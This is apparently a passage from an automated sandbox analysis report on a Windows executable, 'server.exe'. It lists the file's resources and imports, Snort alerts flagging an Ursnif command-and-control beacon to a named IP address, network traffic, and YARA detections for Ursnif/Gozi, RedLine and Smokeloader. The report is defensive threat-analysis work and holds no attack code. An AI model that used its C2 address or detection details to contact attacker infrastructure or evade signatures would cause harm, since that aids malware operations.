          RT_CURSOR0x2702f200x130Device independent bitmap graphic, 32 x 64 x 1, image size 0
          RT_CURSOR0x27030780xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0
          RT_CURSOR0x2703f200x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0
          RT_CURSOR0x27047c80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0
          RT_CURSOR0x2704d600x130Device independent bitmap graphic, 32 x 64 x 1, image size 0
          RT_CURSOR0x2704e900xb0Device independent bitmap graphic, 16 x 32 x 1, image size 0
          RT_ICON0x26e9b100xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0SerbianItaly
          RT_ICON0x26ea9b80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0SerbianItaly
          RT_ICON0x26eb2600x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0SerbianItaly
          RT_ICON0x26eb9280x568Device independent bitmap graphic, 16 x 32 x 8, image size 0SerbianItaly
          RT_ICON0x26ebe900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0SerbianItaly
          RT_ICON0x26ee4380x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0SerbianItaly
          RT_ICON0x26ef4e00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0SerbianItaly
          RT_ICON0x26ef9b00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsSerbianItaly
          RT_ICON0x26f08580x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsSerbianItaly
          RT_ICON0x26f11000x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsSerbianItaly
          RT_ICON0x26f17c80x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsSerbianItaly
          RT_ICON0x26f1d300x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216SerbianItaly
          RT_ICON0x26f42d80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096SerbianItaly
          RT_ICON0x26f53800x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304SerbianItaly
          RT_ICON0x26f5d080x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024SerbianItaly
          RT_ICON0x26f61e80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0SerbianItaly
          RT_ICON0x26f70900x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0SerbianItaly
          RT_ICON0x26f79380x568Device independent bitmap graphic, 16 x 32 x 8, image size 0SerbianItaly
          RT_ICON0x26f7ea00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0SerbianItaly
          RT_ICON0x26fa4480x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0SerbianItaly
          RT_ICON0x26fb4f00x988Device independent bitmap graphic, 24 x 48 x 32, image size 0SerbianItaly
          RT_ICON0x26fbe780x468Device independent bitmap graphic, 16 x 32 x 32, image size 0SerbianItaly
          RT_ICON0x26fc3480xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0SerbianItaly
          RT_ICON0x26fd1f00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0SerbianItaly
          RT_ICON0x26fda980x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0SerbianItaly
          RT_ICON0x26fe1600x568Device independent bitmap graphic, 16 x 32 x 8, image size 0SerbianItaly
          RT_ICON0x26fe6c80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0SerbianItaly
          RT_ICON0x2700c700x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0SerbianItaly
          RT_ICON0x2701d180x988Device independent bitmap graphic, 24 x 48 x 32, image size 0SerbianItaly
          RT_ICON0x27026a00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0SerbianItaly
          RT_DIALOG0x27051600x86data
          RT_STRING0x27051e80x2bedata
          RT_STRING0x27054a80x492data
          RT_STRING0x27059400x5c6data
          RT_STRING0x2705f080x118data
          RT_STRING0x27060200x52adata
          RT_ACCELERATOR0x2702b800x48dataSerbianItaly
          RT_ACCELERATOR0x2702bc80x18dataSerbianItaly
          RT_GROUP_CURSOR0x27030500x22data
          RT_GROUP_CURSOR0x2704d300x30data
          RT_GROUP_CURSOR0x2704f400x22data
          RT_GROUP_ICON0x26fc2e00x68dataSerbianItaly
          RT_GROUP_ICON0x26ef9480x68dataSerbianItaly
          RT_GROUP_ICON0x26f61700x76dataSerbianItaly
          RT_GROUP_ICON0x2702b080x76dataSerbianItaly
          RT_VERSION0x2704f680x1f8data
          None0x2702be00xadata

          Imports

          DLLImport
          KERNEL32.dllCreateHardLinkA, CallNamedPipeW, GetConsoleAliasesA, GetWindowsDirectoryA, GlobalAlloc, WideCharToMultiByte, LoadLibraryW, GetStringTypeExW, GetExitCodeProcess, lstrcpynW, GetFileAttributesW, LocalReAlloc, WriteConsoleW, GetBinaryTypeW, SetLastError, GetProcAddress, VirtualAlloc, OpenJobObjectA, GetFileType, CreateEventW, EnumDateFormatsA, FreeEnvironmentStringsW, GetPrivateProfileSectionA, GetStringTypeW, FindAtomW, DeleteTimerQueueTimer, GlobalAddAtomW, OpenFileMappingA, LCMapStringW, HeapSize, EnumSystemCodePagesW, GetStartupInfoW, HeapAlloc, GetLastError, HeapFree, SetUnhandledExceptionFilter, GetModuleHandleW, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, GetModuleFileNameW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetStartupInfoA, DeleteCriticalSection, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, GetCurrentThreadId, InterlockedDecrement, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, IsDebuggerPresent, LeaveCriticalSection, EnterCriticalSection, HeapReAlloc, RaiseException, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, LoadLibraryA, InitializeCriticalSectionAndSpinCount, RtlUnwind, GetModuleHandleA, LCMapStringA, MultiByteToWideChar, GetStringTypeA, GetLocaleInfoA
          USER32.dllNotifyWinEvent, InvalidateRgn, CreateMDIWindowA, LoadMenuW, GetMenuInfo, ScreenToClient
          GDI32.dllGetGlyphIndicesA

          Possible Origin

          Language of compilation systemCountry where language is spokenMap
          SerbianItaly

          Network Behavior

          Snort IDS Alerts

          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
          192.168.2.45.44.43.1749695802033203 03/16/23-07:23:24.710750TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4969580192.168.2.45.44.43.17
          192.168.2.45.44.43.1749695802033204 03/16/23-07:23:24.710750TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4969580192.168.2.45.44.43.17

          Network Port Distribution

          TCP Packets

          TimestampSource PortDest PortSource IPDest IP
          Mar 16, 2023 07:23:24.650625944 CET4969580192.168.2.45.44.43.17
          Mar 16, 2023 07:23:24.707762957 CET80496955.44.43.17192.168.2.4
          Mar 16, 2023 07:23:24.707907915 CET4969580192.168.2.45.44.43.17
          Mar 16, 2023 07:23:24.710750103 CET4969580192.168.2.45.44.43.17
          Mar 16, 2023 07:23:24.763972044 CET80496955.44.43.17192.168.2.4
          Mar 16, 2023 07:23:24.765341997 CET80496955.44.43.17192.168.2.4
          Mar 16, 2023 07:23:24.765438080 CET4969580192.168.2.45.44.43.17
          Mar 16, 2023 07:23:24.768033028 CET4969580192.168.2.45.44.43.17
          Mar 16, 2023 07:23:24.822140932 CET80496955.44.43.17192.168.2.4
          Mar 16, 2023 07:23:44.814861059 CET4969680192.168.2.431.41.44.108
          Mar 16, 2023 07:23:47.821590900 CET4969680192.168.2.431.41.44.108
          Mar 16, 2023 07:23:53.837632895 CET4969680192.168.2.431.41.44.108

          UDP Packets

          TimestampSource PortDest PortSource IPDest IP
          Mar 16, 2023 07:22:03.757394075 CET5657253192.168.2.48.8.8.8
          Mar 16, 2023 07:22:03.788410902 CET53565728.8.8.8192.168.2.4

          DNS Queries

          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
          Mar 16, 2023 07:22:03.757394075 CET192.168.2.48.8.8.80xe6b9Standard query (0)checklist.skype.comA (IP address)IN (0x0001)false

          DNS Answers

          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
          Mar 16, 2023 07:22:03.788410902 CET8.8.8.8192.168.2.40xe6b9Name error (3)checklist.skype.comnonenoneA (IP address)IN (0x0001)false

          HTTP Request Dependency Graph

          • 5.44.43.17

          Statistics

          No statistics

          System Behavior

          General

          Target ID:0
          Start time:07:21:56
          Start date:16/03/2023
          Path:C:\Users\user\Desktop\server.exe
          Wow64 process (32bit):true
          Commandline:C:\Users\user\Desktop\server.exe
          Imagebase:0x400000
          File size:307200 bytes
          MD5 hash:A4071382A33BB9FA55FF8BF8B111BC39
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.437821342.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.437821342.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.437821342.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.437852108.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.437852108.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.437852108.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.437607337.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.437607337.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.437607337.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.437902952.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.437902952.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.437902952.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.437680280.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.437680280.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.437680280.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.437880464.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.437880464.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.437880464.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.436425972.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.436425972.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.436425972.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.561151548.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000002.561151548.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000002.561151548.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.560851312.0000000002D56000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.560764513.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.437645117.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.437645117.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.437645117.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          Reputation:low

          Disassembly

          No disassembly